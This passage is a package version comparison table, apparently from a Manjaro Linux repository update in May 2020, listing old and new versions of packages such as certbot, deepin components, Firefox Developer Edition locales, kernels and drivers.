                          bsequencer              1.2.0-2              1.4.0-1
                               buddy                2.4-3                2.4-4
                               c-xsc              2.5.4-1              2.5.4-2
                             calibre             4.14.0-2             4.15.0-2
                      calibre-common             4.14.0-2             4.15.0-2
                     calibre-python3             4.14.0-2             4.15.0-2
                            capstone              4.0.1-3              4.0.2-1
                             certbot              1.3.0-1              1.4.0-1
                      certbot-apache              1.3.0-1              1.4.0-1
              certbot-dns-cloudflare              1.3.0-1              1.4.0-1
                certbot-dns-cloudxns              1.3.0-1              1.4.0-1
            certbot-dns-digitalocean              1.3.0-1              1.4.0-1
                certbot-dns-dnsimple              1.3.0-1              1.4.0-1
             certbot-dns-dnsmadeeasy              1.3.0-1              1.4.0-1
                  certbot-dns-gehirn              1.3.0-1              1.4.0-1
                  certbot-dns-google              1.3.0-1              1.4.0-1
                  certbot-dns-linode              1.3.0-1              1.4.0-1
                  certbot-dns-luadns              1.3.0-1              1.4.0-1
                   certbot-dns-nsone              1.3.0-1              1.4.0-1
                     certbot-dns-ovh              1.3.0-1              1.4.0-1
                 certbot-dns-rfc2136              1.3.0-1              1.4.0-1
                 certbot-dns-route53              1.3.0-1              1.4.0-1
             certbot-dns-sakuracloud              1.3.0-1              1.4.0-1
                       certbot-nginx              1.3.0-1              1.4.0-1
                               cgrep            6.6.32-23            6.6.32-24
                             chezmoi              1.8.0-1              1.8.1-1
                              chrony                3.5-2                3.5-3
                               chuck            1.4.0.0-3            1.4.0.1-1
                            conflict           20150705-3           20150705-4
                              coturn            4.5.1.1-8            4.5.1.2-1
                             coxeter       git.20180226-2       git.20180226-3
                                croc              8.0.9-1             8.0.10-1
                             cryptol            2.8.0-106            2.8.0-108
                               darcs             2.14.3-1             2.14.4-1
                           darktable            2:3.0.2-1            2:3.0.2-2
                                dart              2.7.2-1              2.7.4-1
                             dbeaver              7.0.3-1              7.0.4-1
                          deepin-api              5.0.0-4           5.1.11.1-1
                   deepin-boot-maker              5.0.1-1              5.4.8-1
                   deepin-calculator              5.0.1-1              5.5.9-1
                     deepin-calendar              5.0.1-1              5.6.2-1
                        deepin-clone              5.0.1-1              5.0.3-1
               deepin-control-center              5.0.0-1            5.1.0.5-1
                       deepin-daemon              5.0.0-4            5.9.4.2-1
                 deepin-desktop-base       2:2019.07.10-1     2:2020.04.12.2-1
              deepin-desktop-schemas             3.13.9-1         5.4.0099.0-1
                         deepin-dock              5.0.0-6            5.1.0.8-1
                         deepin-draw              1.0.0-2           5.8.0.15-2
                       deepin-editor            1.2.6.4-1              5.6.7-2
                 deepin-file-manager            1:5.0.0-6         1:5.1.1.25-1
                   deepin-icon-theme           15.12.71-1         2020.05.09-1
                 deepin-image-viewer              5.0.0-1            5.6.3.2-1
                         deepin-kwin              0.1.0-8           5.0.14.1-1
                     deepin-launcher              5.0.0-1         5.1.0099.0-1
                         deepin-menu              3.4.8-1              5.0.1-1
                        deepin-movie            1:5.0.0-2         1:5.7.6.29-1
                        deepin-music              5.0.1-3            6.0.1.8-1
                deepin-network-utils              5.0.1-1            5.1.0.0-1
                       deepin-picker              5.0.1-1              5.0.6-1
                 deepin-polkit-agent              5.0.0-1              5.1.0-1
              deepin-qt-dbus-factory              5.0.1-6            5.1.0.0-1
               deepin-qt5dxcb-plugin              5.0.1-6             5.0.11-1
               deepin-qt5integration             5.0.0-10              5.1.0-1
              deepin-screen-recorder              5.0.0-2           5.8.0.11-1
                   deepin-screenshot              5.0.0-2                    -
                   deepin-session-ui              5.0.0-1         5.1.0099.4-1
              deepin-shortcut-viewer              5.0.0-1              5.0.2-1
                  deepin-sound-theme            15.10.3-1            15.10.4-1
               deepin-system-monitor              5.0.0-3              5.6.1-1
                     deepin-terminal              5.0.0-1            5.0.4.1-1
               deepin-voice-recorder              5.0.0-1                    -
            deepin-wallpapers-plasma             5.13.4-1             5.18.5-1
                                 dfc              3.1.1-1              3.1.1-2
                               dhall            1.31.1-19             1.32.0-1
                          dhall-bash            1.0.29-23             1.0.30-2
                          dhall-json             1.6.3-23              1.6.4-1
                          disomaster              5.0.0-1              5.0.1-1
                         dns-lexicon             3.3.20-1             3.3.22-2
                      dns-over-https              2.2.1-2              2.2.1-3
                              dsniff             2.4b1-27             2.4b1-28
                             dtkcore            1:2.1.1-2            1:5.2.0-2
                           dtkwidget              2.1.1-6              5.2.0-1
                               dtkwm             2.0.12-6             2.0.12-7
                                dune              2.3.1-1              2.5.1-1
                            electron              8.2.5-1              8.2.5-2
                           electron4             4.2.12-5             4.2.12-6
                           electron5             5.0.13-4             5.0.13-5
                           electron6              6.1.9-4              6.1.9-5
                           electron7             7.1.14-4             7.1.14-5
                              emovix              0.9.0-7              0.9.0-8
                              erlang             22.2.7-1               22.3-1
                         erlang-docs               22.2-1               22.3-1
                          erlang-nox             22.2.7-1               22.3-1
                     erlang-unixodbc             22.2.7-1               22.3-1
                              eslint              6.8.0-1              7.0.0-1
                             fastjet              3.3.3-1              3.3.4-1
                              faudio              20.04-1              20.05-1
                               faust             2.20.2-4             2.20.2-5
                               fbida               2.14-1               2.14-2
                              fcitx5     0.0.0.20200428-1     0.0.0.20200509-3
                        fcitx5-anthy     0.0.0.20200424-1     0.0.0.20200509-2
                      fcitx5-chewing     0.0.0.20200325-1     0.0.0.20200509-1
               fcitx5-chinese-addons     0.0.0.20200428-1     0.0.0.20200509-2
                          fcitx5-gtk     0.0.0.20200402-1     0.0.0.20200509-1
                       fcitx5-hangul     0.0.0.20200325-1     0.0.0.20200509-1
                           fcitx5-qt     0.0.0.20200428-1     0.0.0.20200509-1
                         fcitx5-rime     0.0.0.20200501-1     0.0.0.20200509-1
                       fcitx5-unikey     0.0.0.20200404-1     0.0.0.20200509-1
           firefox-developer-edition             76.0b8-1             77.0b3-1
  firefox-developer-edition-i18n-ach             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-af             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-an             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-ar             76.0b8-1             77.0b3-1
  firefox-developer-edition-i18n-ast             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-az             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-be             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-bg             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-bn             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-br             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-bs             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-ca             76.0b8-1             77.0b3-1
firefox-developer-edition-i18n-ca-valencia       76.0b8-1             77.0b3-1
  firefox-developer-edition-i18n-cak             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-cs             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-cy             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-da             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-de             76.0b8-1             77.0b3-1
  firefox-developer-edition-i18n-dsb             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-el             76.0b8-1             77.0b3-1
firefox-developer-edition-i18n-en-ca             76.0b8-1             77.0b3-1
firefox-developer-edition-i18n-en-gb             76.0b8-1             77.0b3-1
firefox-developer-edition-i18n-en-us             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-eo             76.0b8-1             77.0b3-1
firefox-developer-edition-i18n-es-ar             76.0b8-1             77.0b3-1
firefox-developer-edition-i18n-es-cl             76.0b8-1             77.0b3-1
firefox-developer-edition-i18n-es-es             76.0b8-1             77.0b3-1
firefox-developer-edition-i18n-es-mx             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-et             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-eu             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-fa             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-ff             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-fi             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-fr             76.0b8-1             77.0b3-1
firefox-developer-edition-i18n-fy-nl             76.0b8-1             77.0b3-1
firefox-developer-edition-i18n-ga-ie             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-gd             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-gl             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-gn             76.0b8-1             77.0b3-1
firefox-developer-edition-i18n-gu-in             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-he             76.0b8-1             77.0b3-1
firefox-developer-edition-i18n-hi-in             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-hr             76.0b8-1             77.0b3-1
  firefox-developer-edition-i18n-hsb             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-hu             76.0b8-1             77.0b3-1
firefox-developer-edition-i18n-hy-am             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-ia             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-id             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-is             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-it             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-ja             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-ka             76.0b8-1             77.0b3-1
  firefox-developer-edition-i18n-kab             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-kk             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-km             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-kn             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-ko             76.0b8-1             77.0b3-1
  firefox-developer-edition-i18n-lij             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-lt             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-lv             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-mk             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-mr             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-ms             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-my             76.0b8-1             77.0b3-1
firefox-developer-edition-i18n-nb-no             76.0b8-1             77.0b3-1
firefox-developer-edition-i18n-ne-np             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-nl             76.0b8-1             77.0b3-1
firefox-developer-edition-i18n-nn-no             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-oc             76.0b8-1             77.0b3-1
firefox-developer-edition-i18n-pa-in             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-pl             76.0b8-1             77.0b3-1
firefox-developer-edition-i18n-pt-br             76.0b8-1             77.0b3-1
firefox-developer-edition-i18n-pt-pt             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-rm             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-ro             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-ru             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-si             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-sk             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-sl             76.0b8-1             77.0b3-1
  firefox-developer-edition-i18n-son             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-sq             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-sr             76.0b8-1             77.0b3-1
firefox-developer-edition-i18n-sv-se             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-ta             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-te             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-th             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-tl             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-tr             76.0b8-1             77.0b3-1
  firefox-developer-edition-i18n-trs             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-uk             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-ur             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-uz             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-vi             76.0b8-1             77.0b3-1
   firefox-developer-edition-i18n-xh             76.0b8-1             77.0b3-1
firefox-developer-edition-i18n-zh-cn             76.0b8-1             77.0b3-1
firefox-developer-edition-i18n-zh-tw             76.0b8-1             77.0b3-1
              firefox-tree-style-tab              3.5.3-1              3.5.4-1
                                fish              3.1.1-1              3.1.2-1
                               flite                2.1-1                2.1-2
               freepats-general-midi           20200405-1           20200508-1
                             freerdp            2:2.0.0-3            2:2.1.0-1
                        freewheeling              0.6.6-1              0.6.6-2
                             gendesk              1.0.5-1              1.0.5-2
                                gfan              0.6.2-1              0.6.2-2
                           git-annex         8.20200501-2         8.20200501-3
                           git-crypt              0.6.0-3              0.6.0-4
                             git-lfs             2.10.0-2             2.11.0-1
                          git-repair        1.20200102-75         1.20200504-1
                              gitlab            12.10.2-1            12.10.2-2
                              glider              0.9.3-1             0.10.0-2
                              gnunet             0.12.2-1             0.12.2-2
                               gnurl             7.69.1-1             7.69.1-2
                          go-bindata              3.5.0-1              3.5.2-1
                           gocryptfs              1.7.1-2              1.8.0-1
                   golang-deepin-lib              5.0.0-1              5.4.5-1
golang-github-linuxdeepin-go-dbus-factory         0.9.0-3              1.6.4-1
golang-github-linuxdeepin-go-x11-client           0.4.1-1              0.6.0-1
                               gsoap            2.8.101-1            2.8.102-1
                            hashdeep                4.4-5                4.4-6
                  haskell-aeson-diff           1.1.0.8-95           1.1.0.8-97
                  haskell-aeson-yaml           1.0.6.0-24           1.0.6.0-25
                         haskell-bz2           1.0.0.2-21            1.0.0.3-1
           haskell-ghc-lib-parser-ex           8.10.0.3-1           8.10.0.4-1
                     haskell-githash           0.1.4.0-15           0.1.4.0-16
                      haskell-hakyll          4.13.3.0-14          4.13.3.0-16
                    haskell-hopenpgp             2.9.4-69             2.9.4-71
                       haskell-hpack           0.33.0-118           0.33.0-119
                       haskell-ipynb            0.1.0.1-1            0.1.0.1-3
                    haskell-mustache             2.3.1-89             2.3.1-90
                      haskell-nettle             0.3.0-70             0.3.0-71
             haskell-optparse-simple          0.1.1.2-182          0.1.1.2-183
                      haskell-pantry           0.4.0.1-38           0.4.0.1-39
                         haskell-sbv               8.6-65               8.6-67
                        haskell-yaml          0.11.3.0-18           0.11.4.0-1
                       haskell-yesod           1.6.0.1-90           1.6.0.1-91
                                helm              3.2.0-1              3.2.1-1
                               hivex             1.3.18-4             1.3.18-5
                         hledger-web            1.17.1-34            1.17.1-35
                               hlint            2.2.11-47            2.2.11-49
                      hopenpgp-tools            0.23.1-30            0.23.1-33
                                hugo             0.69.2-1             0.70.0-1
                              hwinfo              21.70-1              21.70-2
               intel-compute-runtime        20.17.16650-1        20.18.16699-1
             intel-graphics-compiler         1:1.0.3864-1         1:1.0.3899-1
     intellij-idea-community-edition           2:2020.1-1         2:2020.1.1-1
                          inter-font               3.12-1               3.13-1
                     java-commons-io                2.6-1                2.6-2
                             jenkins              2.233-1              2.235-1
                   jupyterlab_server              1.1.1-2              1.1.3-1
                                 jwm              2.3.7-1              2.3.7-2
                          kcm-fcitx5     0.0.0.20200428-1     0.0.0.20200509-1
                             keepass               2.44-1               2.45-1
                            keycloak              9.0.3-2             10.0.0-1
                                kim4              0.9.5-7                    -
                               kitty             0.17.3-1             0.17.4-1
                      kitty-terminfo             0.17.3-1             0.17.4-1
                              kotlin             1.3.70-1             1.3.72-1
                      libcurl-gnutls             7.70.0-1             7.70.0-2
                        libfilezilla             0.19.3-1             0.19.3-2
                            libhandy             0.0.13-1             0.0.13-2
                              libime     0.0.0.20200425-1     0.0.0.20200509-1
                            libmupdf             1.16.1-3             1.17.0-1
                              libolm              3.1.4-2              3.1.4-3
                          librdkafka              1.4.0-1              1.4.2-2
                            libressl              3.1.0-1              3.1.1-1
                             librime            1:1.5.3-6            1:1.5.3-7
                            librtmp0                2.4-4                2.4-5
                        libsidplayfp              2.0.1-1              2.0.2-1
                             libvips              8.9.0-3              8.9.2-1
                             liteide               36.3-2               37.1-1
                                llpp                 31-4    31.r41.g233b1a0-1
                             lockdev          1.0.3_1.6-5          1.0.3_1.6-6
                      lua-filesystem            1.7.0.2-1              1.8.0-1
                         lua51-bitop              1.0.2-8              1.0.2-9
                    lua51-filesystem            1.7.0.2-1              1.8.0-1
                         lua52-bitop              1.0.2-8              1.0.2-9
                    lua52-filesystem            1.7.0.2-1              1.8.0-1
                                 lxd              4.0.1-1                4.1-1
                             mailman             2.1.32-1             2.1.33-1
                     man-pages-zh_cn            1.6.3.3-1            1.6.3.4-1
                     man-pages-zh_tw            1.6.3.3-1            1.6.3.4-1
                   massif-visualizer              0.7.0-2              0.7.0-3
               matrix-appservice-irc             0.17.0-1             0.17.1-1
                      matrix-synapse             1.11.0-1             1.12.4-1
                                mcqd              1.0.0-1              1.0.0-2
                             memconf               3.14-1               3.15-1
                          metasploit             5.0.86-1             5.0.88-1
                             mimetic              0.9.8-1              0.9.8-2
                               minio         2020.03.06-1         2020.05.06-1
                        minio-client         2019.12.17-2         2020.05.06-1
                              minted                2.5-1                2.5-2
                            mldonkey              3.1.6-2              3.1.6-3
                             moosefs            3.0.111-1            3.0.112-1
                     multipath-tools              0.8.3-3              0.8.4-1
                               mupdf             1.16.1-3             1.17.0-1
                            mupdf-gl             1.16.1-3             1.17.0-1
                         mupdf-tools             1.16.1-3             1.17.0-1
               netfilter-fullconenat       r73.0cf3b48-15       r73.0cf3b48-16
             nextcloud-app-bookmarks            1:3.0.0-1            1:3.0.4-1
                  nextcloud-app-deck            1:0.8.2-1            1:1.0.0-1
                  nextcloud-app-mail              1.3.3-1              1.3.4-1
                  nextcloud-app-news             14.1.6-1             14.1.7-1
                 nextcloud-app-notes              3.2.0-1              3.3.0-1
                              nodejs             14.1.0-2             14.2.0-1
                                 npm             6.14.4-1             6.14.5-1
                   npm-check-updates              4.1.2-1              5.0.0-1
                           oniguruma              6.9.5-1         6.9.5_rev1-1
                                opam              2.0.6-2              2.0.7-1
                             opendht           1:1.10.1-5           1:1.10.1-6
                           pam_mount               2.16-4               2.16-5
                              pandoc           2.9.2.1-29           2.9.2.1-31
                     pandoc-citeproc              0.17-90              0.17-92
                     pandoc-crossref           0.3.6.2-85           0.3.6.2-87
                               pbpst              1.4.1-1              1.4.1-2
                                  pd             0.50.2-2             0.50.2-3
              perl-scalar-list-utils               1.54-1               1.55-1
                            pgadmin4               4.20-1               4.21-1
                              picard              2.3.1-1              2.3.2-1
                               picom                  8-1                  8-2
                                plib              1.8.5-8                    -
                                po4a               0.57-1               0.58-1
                              polipo              1.1.1-3              1.1.1-4
                            powertop               2.11-1               2.12-1
                 profile-sync-daemon               6.38-1               6.40-1
                            pstreams              1.0.1-1                    -
                          pulsemixer              1.5.0-2              1.5.1-1
           pycharm-community-edition           2019.2.3-1           2020.1.1-1
                         python-acme              1.3.0-1              1.4.0-1
                 python-aioitertools              0.6.1-1              0.7.0-1
                      python-awkward            0.12.20-1            0.12.21-1
           python-aws-sam-translator             1.22.0-1             1.23.0-1
                       python-bleach              3.1.3-1              3.1.5-1
                      python-blinker                1.4-6                1.4-7
                    python-braintree              4.0.0-1              4.1.0-1
                     python-capstone              4.0.1-3              4.0.2-1
                       python-daemon              2.2.4-3              2.2.4-4
                          python-ddt              1.3.1-1              1.4.0-1
                      python-dropbox             10.1.1-1             10.1.2-1
                python-elasticsearch              7.6.0-1              7.6.0-2
                       python-fields              5.0.0-6              5.0.0-7
                        python-flask              1.1.2-1              1.1.2-2
                   python-flask-mail              0.9.1-3              0.9.1-4
               python-flask-paranoid                0.2-3                0.2-4
              python-flask-principal              0.4.0-3              0.4.0-4
                 python-flask-script              2.0.6-4              2.0.6-5
                    python-fonttools              4.8.1-1              4.9.0-1
                   python-hypothesis             5.10.4-1             5.11.0-1
                    python-icalendar              4.0.5-1              4.0.6-1
                 python-itsdangerous              1.1.0-3              1.1.0-4
               python-logilab-common              1.6.0-1              1.6.1-1
                        python-mamba               0.10-4             0.11.0-1
                  python-marshmallow              3.5.2-1              3.6.0-1
                          python-olm              3.1.4-2              3.1.4-3
                 python-phonenumbers             8.12.2-1             8.12.3-1
                     python-pwntools              4.0.1-3              4.1.0-1
                   python-py-cpuinfo              5.0.0-4              5.0.0-5
                       python-pyface              6.1.2-3              7.0.0-1
                        python-pygal            1:2.4.0-4            1:2.4.0-5
                       python-pyglet              1.5.4-2              1.5.5-1
                       python-pytest              5.4.1-1              5.4.2-1
             python-pytest-benchmark              3.2.3-1              3.2.3-2
                python-pytest-pylint             0.15.1-1             0.16.0-1
                python-requests-mock              1.7.0-4              1.8.0-1
                      python-seaborn             0.10.0-1             0.10.1-1
                       python-semver              2.9.1-1             2.10.0-1
                   python-tensorflow           2.2.0rc3-2              2.2.0-1
              python-tensorflow-cuda           2.2.0rc3-2              2.2.0-1
               python-tensorflow-opt           2.2.0rc3-2              2.2.0-1
          python-tensorflow-opt-cuda           2.2.0rc3-2              2.2.0-1
                       python-traits              5.2.0-1              6.0.0-1
                     python-traitsui              6.1.3-3              7.0.0-1
               python-update-checker               0.16-3               0.17-1
                       python-uproot             3.11.4-1             3.11.5-1
                  python-uproot-docs             3.11.4-1             3.11.5-1
               python-uproot-methods              0.7.3-2              0.7.4-1
                     python-werkzeug              1.0.1-1              1.0.1-2
                       python-yaspin             0.16.0-1             0.17.0-1
                     python2-blinker                1.4-6                    -
                      python2-daemon              2.2.4-3                    -
               python2-elasticsearch              7.6.0-1                    -
                      python2-fields              5.0.0-6              5.0.0-7
                       python2-flask              1.1.2-1                    -
                python2-itsdangerous              1.1.0-3                    -
                  python2-py-cpuinfo              5.0.0-4                    -
                       python2-pygal            1:2.4.0-4                    -
            python2-pytest-benchmark              3.2.3-1                    -
                python2-subprocess32              3.5.3-1                    -
                    python2-werkzeug              1.0.1-1                    -
                                 qiv              2.3.2-1              2.3.2-2
                                qmmp              1.3.7-1              1.4.0-1
                            qrupdate              1.1.2-3              1.1.2-4
                                qtox             1.17.2-1             1.17.2-2
                            qtractor             0.9.13-1             0.9.14-1
                         qutebrowser             1.11.0-1             1.11.1-1
                               qvkbd        git20170102-1        git20170102-2
                        r2ghidra-dec       r167.d8a184c-1              4.4.0-1
                             radare2              4.3.1-2              4.4.0-1
                      radare2-cutter           1:1.10.2-3           1:1.10.3-1
                              radcli             1.2.11-2             1.2.11-3
              rapid-photo-downloader             0.9.23-1             0.9.24-1
                              rclone             1.51.0-3             1.51.0-4
                            rdesktop              1.9.0-1              1.9.0-2
               react-native-debugger             0.11.1-1             0.11.3-1
                      rime-cantonese     0.0.0.20200502-1     0.0.0.20200510-1
                        riot-desktop             1.5.15-1              1.6.0-2
                            riot-web             1.5.15-1              1.6.0-2
                             ripgrep             12.0.1-1             12.1.0-1
              sage-data-polytopes_db           20170220-1           20170220-2
                                 sbt            1:1.3.9-1           1:1.3.10-1
                                  sd              0.7.4-1              0.7.5-1
                  shadowsocks-deepin              1.2.2-1                    -
                          shellcheck              0.7.1-8             0.7.1-10
                               shfmt              3.1.0-1              3.1.1-1
                         simple-scan             3.36.2-1           3.36.2.1-1
                            singular              4.1.3-1           4.1.3.p1-1
                            skanlite            2.1.0.1-1            2.1.0.1-2
                           sleuthkit              4.8.0-1              4.9.0-1
                                smem                1.5-1                1.5-2
                               smlnj             110.95-1             110.96-1
                            solidity              0.6.6-1              0.6.7-1
                               squid               4.10-1               4.10-2
                              ssdeep             2.14.1-1             2.14.1-2
                               stack              2.3.1-1              2.3.1-2
                            startdde              5.0.1-3            5.3.0.1-2
                             sthttpd             2.27.1-1             2.27.1-2
                         sunxi-tools              1.4.2-2              1.4.2-3
                            supermin             5.1.20-4              5.2.0-2
                           syncthing              1.4.2-1              1.5.0-1
                  syncthing-relaysrv              1.4.2-1              1.5.0-1
                              sysdig             0.26.6-3             0.26.7-1
                    telegram-desktop              2.1.1-1              2.1.4-1
                             tellico              3.2.3-1                3.3-1
                          tensorflow           2.2.0rc3-2              2.2.0-1
                     tensorflow-cuda           2.2.0rc3-2              2.2.0-1
                      tensorflow-opt           2.2.0rc3-2              2.2.0-1
                 tensorflow-opt-cuda           2.2.0rc3-2              2.2.0-1
                          testssl.sh              3.0.1-1              3.0.2-1
                            tigervnc             1.10.1-1             1.10.1-2
                               tilda              1.5.0-1              1.5.2-1
                               tokei             11.1.0-1             11.1.1-1
                             toxcore           1:0.2.11-1           1:0.2.12-1
                               toxic              0.8.3-2              0.8.3-3
                  ttf-jetbrains-mono              1.0.5-1              1.0.6-1
                          ttf-roboto              2.138-1              2.138-2
                              tuntox              0.0.9-1              0.0.9-2
                           typespeed              0.6.5-7              0.6.5-8
                         udisks2-qt5              5.0.0-1              5.0.3-1
                  ukui-window-switch              2.0.2-1              2.0.3-1
                            urlwatch               2.18-2               2.18-3
                                utox             0.17.2-1             0.17.2-2
                               v2ray             4.23.1-1             4.23.1-2
         v2ray-domain-list-community       202005041039-1       202005092152-1
                         v2ray-geoip       202004290001-1       202005060001-1
                             vagrant              2.2.7-5              2.2.8-1
                              viking                1.8-2                1.8-3
                        vim-nerdtree              6.5.0-1              6.6.1-1
                        wire-desktop          3.16.2923-1          3.17.2924-1
                      wishbone-utils              0.6.9-1             0.6.17-1
                           wordpress                5.4-1              5.4.1-1
                          xcb-imdkit     0.0.0.20200419-1     0.0.0.20200509-1
                                 xdo              0.5.7-1              0.5.7-2
                              xrootd             4.11.3-1             4.12.0-1
                          youtube-dl         2020.05.03-1         2020.05.08-1
                               zcash              2.1.2-1            2.1.2_3-1
                                zile             2.4.14-1             2.4.14-2
                       acme-redirect                    -              0.2.0-1
                      bemenu-ncurses                    -              0.4.0-1
                      bemenu-wlroots                    -              0.4.0-1
                          bemenu-x11                    -              0.4.0-1
                         cargo-watch                    -              7.3.0-2
                             dbxtool                    -                  7-1
                        deepin-album                    -           5.6.9.13-1
                deepin-session-shell                    -         5.0.0098.0-2
                              dtkgui                    -              5.2.0-1
                              global                    -              6.6.4-1
                             oscpack                    -              1.1.0-1
                         staticcheck                    -           2020.1.3-1


:: Different overlay package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-05-08           2020-05-11
-------------------------------------------------------------------------------
                              json-c             0.14-2.1                    -
                            linux414           4.14.178-1           4.14.179-1
                    linux414-headers           4.14.178-1           4.14.179-1
                            linux419           4.19.120-1           4.19.121-1
                    linux419-headers           4.19.120-1           4.19.121-1
                             linux44            4.4.221-1            4.4.222-1
                     linux44-headers            4.4.221-1            4.4.222-1
                             linux49            4.9.221-1            4.9.222-1
                     linux49-headers            4.9.221-1            4.9.222-1
                             linux54             5.4.38-1             5.4.39-1
                     linux54-headers             5.4.38-1             5.4.39-1
                             linux56             5.6.10-3             5.6.11-1
                     linux56-headers             5.6.10-3             5.6.11-1
                     manjaro-release               20.0-1             20.0.1-1
                             systemd              244.4-1              245.5-2
                        systemd-libs              244.4-1              245.5-2
                  systemd-resolvconf              244.4-1              245.5-2
                  systemd-sysvcompat              244.4-1              245.5-2


:: Different sync package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-05-08           2020-05-11
-------------------------------------------------------------------------------
                                 acl             2.2.53-2             2.2.53-3
                              argon2           20190702-2           20190702-3
                                attr             2.4.48-2             2.4.48-3
                          cryptsetup              2.3.2-1              2.3.2-2
                       device-mapper           2.02.187-1           2.02.187-2
                           e2fsprogs             1.45.6-1             1.45.6-2
                              gnutls             3.6.13-1             3.6.13-2
                               gpgme             1.13.1-3             1.13.1-5
                              json-c               0.14-2               0.14-4
                            keyutils              1.6.1-3              1.6.1-4
                              libidn               1.35-2                    -
                       libmicrohttpd             0.9.70-2             0.9.70-3
                          libp11-kit            0.23.20-4            0.23.20-5
                                lvm2           2.02.187-1           2.02.187-2
                              nettle              3.5.1-2                3.6-1
                             p11-kit            0.23.20-4            0.23.20-5
                        python-gpgme             1.13.1-3             1.13.1-5
                              qgpgme             1.13.1-3             1.13.1-5


:: Different overlay package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2020-05-08           2020-05-11
-------------------------------------------------------------------------------
                           calamares           3.2.23.2-3           3.2.23.2-1
               calamares-git 3.2.24.r7826.fb8e69ca6-3 3.2.24.r7826.fb8e69ca6-1
                linux316-ndiswrapper              1.62-17               1.63-1
                  linux414-acpi_call            1.1.0-150            1.1.0-151
                   linux414-bbswitch              0.8-150              0.8-151
                linux414-broadcom-wl     6.30.223.271-150     6.30.223.271-151
                linux414-ndiswrapper              1.62-45               1.63-1
               linux414-nvidia-340xx           340.108-19           340.108-20
               linux414-nvidia-390xx           390.132-27           390.132-28
               linux414-nvidia-418xx           418.113-24           418.113-25
               linux414-nvidia-430xx            430.64-25            430.64-26
               linux414-nvidia-435xx            435.21-35            435.21-36
               linux414-nvidia-440xx             440.82-4             440.82-5
                   linux414-nvidiabl             0.88-150             0.88-151
                      linux414-r8168           8.048.02-2           8.048.02-3
                  linux414-rt3562sta       2.4.1.1_r4-150       2.4.1.1_r4-151
                   linux414-tp_smapi              0.43-42              0.43-43
                linux414-vhba-module          20200106-13          20200106-14
    linux414-virtualbox-host-modules              6.1.6-3              6.1.6-4
                        linux414-zfs             0.8.3-12             0.8.3-13
                  linux419-acpi_call            1.1.0-110            1.1.0-111
                   linux419-bbswitch              0.8-110              0.8-111
                linux419-broadcom-wl     6.30.223.271-109     6.30.223.271-110
                linux419-ndiswrapper              1.62-59               1.63-1
               linux419-nvidia-340xx           340.108-30           340.108-31
               linux419-nvidia-390xx           390.132-39           390.132-40
               linux419-nvidia-418xx           418.113-38           418.113-39
               linux419-nvidia-430xx            430.64-38            430.64-39
               linux419-nvidia-435xx            435.21-49            435.21-50
               linux419-nvidia-440xx             440.82-7             440.82-8
                   linux419-nvidiabl             0.88-109             0.88-110
